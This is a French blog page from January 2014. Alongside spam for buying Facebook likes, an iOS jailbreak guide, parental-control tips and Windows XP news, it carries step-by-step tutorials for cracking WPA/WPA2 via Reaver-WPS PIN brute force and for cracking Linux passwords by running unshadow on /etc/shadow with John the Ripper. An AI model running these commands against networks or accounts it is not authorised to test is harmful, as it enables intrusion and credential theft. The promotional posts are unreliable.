dimanche 19 janvier 2014

Acheter des fans Facebook - Acheter des vues Youtube


Acheter des (Jaime) vous aidera à augmenter rapidement la notoriété de votre 

compte Facebook, Photos ou Messages. Le package de 10 000 J’aime Facebook est le 

plus intéréssant des sites webs.

Contactez ICI 




vendredi 17 janvier 2014

Reaver-wps
Cracker un point d'accès wifi WPA/WPA2



Pour : Linux, Mac et Windows


Ce tutoriel a pour ojectif de vous montrer le fonctionnement de Reaver-wps qui utilise une faille de sécurité sur certain point d'accès wifi.
Cette outil vous permet de tester la sécurité de votre réseau wifi et ne doit en aucun cas être utilisé pour pirater des points accès ne nous appartenant pas, celà est stritement interdit.

Cette attaque est de type brute force et ne marche uniquement que si le point d'accès wifi a le dispositif de sécurité WPS d'activé.



Télécharger et installer les logiciels nécessaire

Télécharger la dernière version de Libpcap sur le site www.tcpdump.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.2.1:

 wget www.tcpdump.org/release/libpcap-1.2.1.tar.gz


Télécharger la dernière version de la suite Aircrack sur www.aircrack-ng.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.1:
 wget download.aircrack-ng.org/aircrack-ng-1.1.tar.gz


Télécharger la dernière version de Reaver-wps sur reaver-wps.googlecode.com
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.4:
 wget reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


Voir ce tutoriel pour décompresser et installer les logiciels:
Make - Compiler, configurer et installer un logiciel avec les sources



Fonctionnement

On va lancer l'outil airmon-ng en mode surveillance (monitor).
On commence par afficher les cartes wifi disponible, saisissez dans un terminal:
 # airmon-ng






Pour lancer la surveillance sur votre interface wifi:
 # airmon-ng start wlan0




Après on lance airodump pour afficher les réseaux disponibles:
 # airodump-ng mon0




Après avoir trouvé le point d'accès à attaquer, on lance reaver-wps avec les arguments suivants:
 reaver -i mon0 -b [BSSID de l'AP] -vv


Quelques options supplémentaires a reaver-wps:
-e [ESSID du point d'accès]
-c [Canal du point d'accès]
-t [Delai d'attente de la réception avant de renvoyer] Default 5 secondes
-d [Delai entre chaque tentatives de connexion] Default 1 seondes
-l [Delai d'attente en secondes lors d'une détection WPS]
-f Pour obliger reaver-wps a ne pas changer ne canal
-vv Mode bavard (verbose)
-x [Temps en secondes]
-r [NB Tentative]:[Temps d'arrêt] Permet de faire une pause toutes les X tentatives.

Normalement, reaver-wps doit automatiquement se configurer pour s'associer au point d'accès et ainsi commencer l'attaque brute force du PIN.



Une fois le code PIN trouvé, reaver-wps vous affichera la clé de connexion WPA/WPA2 PSK



Sauvegarde

Les données lors de l'attaque d'un point d'accès wifi sont enregistré dans le répertoire:
/etc/reaver

Ce qui permet de relancer plus tard le scan du PA au point où vous étiez arrêté.





Les messages d'erreurs de Reaver WPS

 Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying"
Cela signifie que le point d'accès dispose d'une protection qui a pour but de bloquer toute nouvelle tentative de connexion, assez souvent pendant 5 minutes.
Reaver-wps relancera une nouvelle attaque au bout de 5 minutes et 15 secondes (315 secondes).

Ce delai peut être rallongé si le PA a un temps d'attente plus longue avant de relancer le WPS:
-l [Delai d'attente en secondes lors d'une détection WPS]

Vous pouvez spécifier un delai d'attente lorsque 10 erreurs WPS consecutives ont étés rencontrés:
-x [Temps en secondes]

Ou encore avec l'option "-r", essayez de faire par exemple une pause de 60 secondes toutes les 3 tentatives:
-r 3:60
Cela affichera ce message d'information a chaque fois:
Entering recurring delay of 60 seconds


 Message "WARNING: Receive timeout occured"
Signifie que reaver-wps a une perte de réception avec le point accès.
Vérifiez que la force du signal.



Base de donnée de Reaver WPS

L'auteur met à disposition une base de donnée sur les points d'accès wifi (modem/routeur/box) qui on été testé avec Reaver WPS.
Cette base de donnée est réalisé dans le tableur de Google Document, disponible à cette adresse:
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0

jeudi 9 janvier 2014

طريقة سهلة و مربحة لكسب المال عن طريق اﻷنترنيت و استغل اشتراكاتك على الفايسبوك و التويتر ,,,


السلام عليكم
طريقة سهلة و مربحة لكسب المال عن طريق اﻷنترنيت و استغل اشتراكاتك على الفايسبوك و التويتر ,,,
ما عليك سوى اﻹشتراك أسفله أو على الرابط التالي هنا  و قم بتفعيل روابطك حظا طيبا


Il est possible de jailbreaker TOUS les appareils de la pomme tournant sous iOS 7 (d’iOS 7.0 à iOS 7.0.4) même les plus récents


Ce jailbreak est aussi simple que les précédentes versions d’evasi0n et vous prendra en tout moins de 10 minutes :

  1.     Téléchargez evad3rs sur le site officiel  ICI    
  2.     Ouvrez l’application
  3.     Connectez votre appareil via un cable USB
  4.     Attendez qu’evasi0n le reconnaisse et que le bouton Jailbreak soit cliquable Cliquez dessus
  5.     Attendez 5 minutes sans toucher à rien
  6.     Un message va alors apparaître à l’écran vous demandant de déverrouiller votre appareil puis de cliquer sur l’icône evasi0n
  7.     Encore quelques redémarrages et … votre appareil sera jailbreak.

mardi 7 janvier 2014

Sans Pub CREER UN SITE WEB GRATUIT ET GAGNER DE L ARGENT



Vous pouvez non seulement créer des sites Web gratuitement, mais également percevoir des commissions grâce à vos sites Web gratuits. Chaque site Web que vous créerez contiendra automatiquement une bannière publicitaire avec un code d’affilié unique. Vous pouvez choisir la taille, la forme et le style de design de votre bannière mais aussi de la positionner n’importe où sur vos pages Web. Cela vous permettra de l’intégrer harmonieusement au design de votre site Web.

enregistrement facile ICI

Cracker un point d'accès wifi WPA/WPA2

Reaver-wps
Cracker un point d'accès wifi WPA/WPA2



Pour : Linux, Mac et Windows


Ce tutoriel a pour ojectif de vous montrer le fonctionnement de Reaver-wps qui utilise une faille de sécurité sur certain point d'accès wifi.
Cette outil vous permet de tester la sécurité de votre réseau wifi et ne doit en aucun cas être utilisé pour pirater des points accès ne nous appartenant pas, celà est stritement interdit.

Cette attaque est de type brute force et ne marche uniquement que si le point d'accès wifi a le dispositif de sécurité WPS d'activé.



Télécharger et installer les logiciels nécessaire

Télécharger la dernière version de Libpcap sur le site www.tcpdump.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.2.1:

 wget www.tcpdump.org/release/libpcap-1.2.1.tar.gz


Télécharger la dernière version de la suite Aircrack sur www.aircrack-ng.org
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.1:
 wget download.aircrack-ng.org/aircrack-ng-1.1.tar.gz


Télécharger la dernière version de Reaver-wps sur reaver-wps.googlecode.com
Ou par exemple sous Linux, téléchargement en ligne de commande de la version 1.4:
 wget reaver-wps.googlecode.com/files/reaver-1.4.tar.gz


Voir ce tutoriel pour décompresser et installer les logiciels:
Make - Compiler, configurer et installer un logiciel avec les sources



Fonctionnement

On va lancer l'outil airmon-ng en mode surveillance (monitor).
On commence par afficher les cartes wifi disponible, saisissez dans un terminal:
 # airmon-ng




Pour lancer la surveillance sur votre interface wifi:
 # airmon-ng start wlan0




Après on lance airodump pour afficher les réseaux disponibles:
 # airodump-ng mon0




Après avoir trouvé le point d'accès à attaquer, on lance reaver-wps avec les arguments suivants:
 reaver -i mon0 -b [BSSID de l'AP] -vv


Quelques options supplémentaires a reaver-wps:
-e [ESSID du point d'accès]
-c [Canal du point d'accès]
-t [Delai d'attente de la réception avant de renvoyer] Default 5 secondes
-d [Delai entre chaque tentatives de connexion] Default 1 seondes
-l [Delai d'attente en secondes lors d'une détection WPS]
-f Pour obliger reaver-wps a ne pas changer ne canal
-vv Mode bavard (verbose)
-x [Temps en secondes]
-r [NB Tentative]:[Temps d'arrêt] Permet de faire une pause toutes les X tentatives.

Normalement, reaver-wps doit automatiquement se configurer pour s'associer au point d'accès et ainsi commencer l'attaque brute force du PIN.



Une fois le code PIN trouvé, reaver-wps vous affichera la clé de connexion WPA/WPA2 PSK



Sauvegarde

Les données lors de l'attaque d'un point d'accès wifi sont enregistré dans le répertoire:
/etc/reaver

Ce qui permet de relancer plus tard le scan du PA au point où vous étiez arrêté.





Les messages d'erreurs de Reaver WPS

 Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying"
Cela signifie que le point d'accès dispose d'une protection qui a pour but de bloquer toute nouvelle tentative de connexion, assez souvent pendant 5 minutes.
Reaver-wps relancera une nouvelle attaque au bout de 5 minutes et 15 secondes (315 secondes).

Ce delai peut être rallongé si le PA a un temps d'attente plus longue avant de relancer le WPS:
-l [Delai d'attente en secondes lors d'une détection WPS]

Vous pouvez spécifier un delai d'attente lorsque 10 erreurs WPS consecutives ont étés rencontrés:
-x [Temps en secondes]

Ou encore avec l'option "-r", essayez de faire par exemple une pause de 60 secondes toutes les 3 tentatives:
-r 3:60
Cela affichera ce message d'information a chaque fois:
Entering recurring delay of 60 seconds


 Message "WARNING: Receive timeout occured"
Signifie que reaver-wps a une perte de réception avec le point accès.
Vérifiez que la force du signal.



Base de donnée de Reaver WPS

L'auteur met à disposition une base de donnée sur les points d'accès wifi (modem/routeur/box) qui on été testé avec Reaver WPS.
Cette base de donnée est réalisé dans le tableur de Google Document, disponible à cette adresse:
https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0

John The Ripper Comment cracker un mot de passe sous Linux ?

Pour : Linux

John The Ripper permet de trouver le mot de passe de n'importe quel compte utilisateur sur un machine linux.
La méthode est assez simple, le logiciel teste toutes les combinaisons de manière incrémentale (force brute) ou depuis une liste de mot (dictionnaire) jusqu'a faire correspondre le hash du mot de passe crypté avec celui du mot de passe testé.

Combien de temps pour cracker un mot de passe?
La durée peut varier selon la performance de votre machine et surtout la complexiter du mot de passe.

Installation

On va installer le logiciel depuis les dépôts:
 apt-get install john


Utilisation

Le mot de passe des utilisateurs sont sauvegardé dans deux fichiers qui sont uniquement accessible depuis le compte root..
Le fichier "/etc/passwd" qui contient les noms des comptes utilisateurs (logins) et le fichier "/etc/shadow" qui contient les mots de passes mais cryptés.

On va devoir fusionner les 2 fichiers en un seul avec la commande "unshadow".
 unshadow /etc/passwd /etc/shadow > pass.txt


Maintenant il y a plus qu'à exécuter "John" pour décrypter notre fichier par force brute.
 john pass.txt


Par défault il va cracker les mots de passe de tout les comptes, ce qui va prendre du temps.
Mais il est possible de spécifier le nom d'un compte à cracker ou bien avec le numéro UID.
Exemple pour l'utilisateur toto:
john --users=toto pass.txt
john --users=1055 pass.txt

Vous pouvez scpécifier le type d'attaque brute force, que les chiffres, que les lettres ...
john -incremental:alpha pass.txt (Seulements les lettres)
john -incremental:digits pass.txt (Seulements les chiffres)
john -incremental:lanman pass.txt (Chiffres, lettres et certains caractères scpéciaux)
john -incremental:all pass.txt (Tous les caractères)

Pour afficher les passwords une fois le travail de fini.
 john --show pass.txt


Il est possible de faire un petit bench pour connaître la vitesse de travail du logiciel "John the Ripper" sur votre machine.
 john --test


A noter que les mots de passes trouvé sont enregistré dans un fichier:
/home/[nom_utilisateur]/.john/john.pot



Message d'erreur

Ce message d'erreur peut s'afficher suite a un arrêt brusque de "John the Ripper" puis au relancement de la même tâche.
 Crash recovery file is locked: /home/cedric/.john/john.rec


Cela veut dure qu'il y à un processus de John qui tourne en arrière plan et vérouille le fichier de récupération pour restaurer le travail.
Le moyen de résoudre ce problème est de tuer le processus de John the Ripper qui tourne en tâche de fond.

lundi 6 janvier 2014

Sécurité informatique - Contrôler l'accès à Internet de vos enfants

L'accès Internet aux enfants et aux adolescents peut s'avérer une véritable calamité et devenir rapidement une addiction.
Comment contrôler et limiter l'accès à un navigateur Internet à vos enfants et vos petits enfants ?

Quelques règles simples :
·         La discussion avec vos enfants et vos petits enfants.
·         L’emplacement du micro ordinateur
·         Le contrôle de l’accès aux navigateurs.
Etc.


Contrôle  -  La discussion avec vos enfants et vos petits enfants

Même si le monde « Internet » ne vous intéresse pas et/ou vous dépasse, il est bon que vous en discutiez avec vos enfants et vos petits enfants.

Bien sûr personne ne vous oblige à ouvrir et à utiliser un ordinateur, mais vous pourrez ainsi comprendre ce qu’ils veulent et recherchent sur Internet et leurs montrer que vous n’êtes pas complètement « hors circuit ».

Le « Chat » et les réseaux sociaux tels que TWITER, FACEBOOK, etc. sont des espaces, irréels pour vous, mais bien réels pour vos enfants. Ils peuvent s’y exprimer et dialoguer avec leurs amis, amies, copains, copines.

Cela peut être sain quand l’espace du réseau social est très restreint, que les enfants connaissent bien tous leurs interlocuteurs, et limitent les informations déposées : « pas d’informations personnelles familiales (domicile, téléphone, etc,) où très personnelles ».

Mais cela peut très vite s’avérer dangereux dans le cas où des personnes étrangères et « mal intentionnées » s’insèrent dans cet espace du réseau social et peuvent en profiter pour extorquer :
·         L’adresse du domicile,
·         Les numéros de téléphones de toute la famille,
·         Les âges, nom et prénoms de toute la famille,
·         Les activités et les absences des membres de la famille,

Mais cela peut aller très loin en débouchant sur un dialogue sexuel.

Aussi, par le dialogue avec vos enfants et vos petits enfants, les avertir qu’il faut :
·         Faire très attention aux correspondants,
·         Faire très attention à ce que l’on écrit,
·         Faire très attention à ce que l’on dit,
·         Dès que l’on s’aperçoit que l’on s’est fait piégé, que cela a été trop loin et/ou que cela a un caractère sexuel avertir immédiatement un adulte de la famille,
·         Leur expliquer que ce n’est pas de leur faute, mais qu’ils ont été piégés « à l’insu de leur plein grès ».

Contrôle  -  Lemplacement du micro ordinateur

Le meilleur emplacement pour un ordinateur familial est bien sûr dans la salle de séjour.

Bien entendu pas d’ordinateur personnel dans les chambres et ni avant 16 ans.

Contrôle  -  Un compte non administrateur pour les enfants

Créer un compte non administrateur pour les enfants et, en aucun cas, ne donnez pas votre mot de passe à vos enfants.

Contrôle  -  Le contrôle de l’accès aux navigateurs

Quelques logiciels :

NetAddictFree

NetAddictFree propose un contrôle parental basé sur la discussion et la mise en place de règles après un dialogue avec l'enfant ou l'adolescent. Il se veut léger pour ne pas impacter les performances de l'ordinateur.

Je n’ai pas encore tout testé de NetAddictFree, mais ce logiciel envoie par MAIL aux parents un bilan hebdomadaire qui montre :
·         Le total journalier où l’ordinateur est allumé.
·         Le total journalier où il y a un accès à Internet avec un navigateur ou un jeu.

Nota :
·         Je préconise la version GOLD qui permet une :
   « Administration à distance des comptes gérés via le site internet »

vendredi 3 janvier 2014

Les hackers ont Windows XP dans le collimateur.

Le 8 avril 2014, c’en sera terminé du support technique étendu de Windows XP. Les pirates informatiques guettent l’échéance.

Dans moins d’un an, le support technique étendu de Windows XP prendra fin : à compter du 8 avril 2014, plus aucun Service Pack, plus aucun correctif de sécurité ne sera déployé.

A l’heure actuelle, un tiers des PC recensés à l’échelle de la planète n’ont pas encore migré vers une version ultérieure du système d’exploitation de Microsoft.

Ils constituent autant de cibles potentielles pour les pirates ayant découvert des failles dont certaines resteront probablement actives après la diffusion des dernières mises à jour.

Ces vulnérabilités pourraient alors se monnayer à prix d’or aux plus offrants, à moins que toutes les entreprises acceptent de payer une fortune à Microsoft pour maintenir leur version de Windows XP…

Au marché noir, le prix varie de 5 000 à 150 000 dollars. Nul doute que les brèches qui seront découvertes et conservées jusqu’à cette date se iront chercher dans le haut de la fourchette.

Il est en outre est plus facile de hacker un Windows XP qu’un Windows 7 ou 8, comme le note Silicon.fr.

Dans ces conditions, les pirates vont se précipiter sur cet argent facile à gagner… Et vont former une lourde menace au-dessus de nos PC et des systèmes d’information.

C’est aussi l’occasion, pour Microsoft, de motiver le grand saut vers Windows 8, dont l’accueil reste mitigé après neuf mois et demi : l’arrêt des mises à jour de sécurité, y compris critiques, pose inévitablement la question de l’adoption d’un OS plus récent.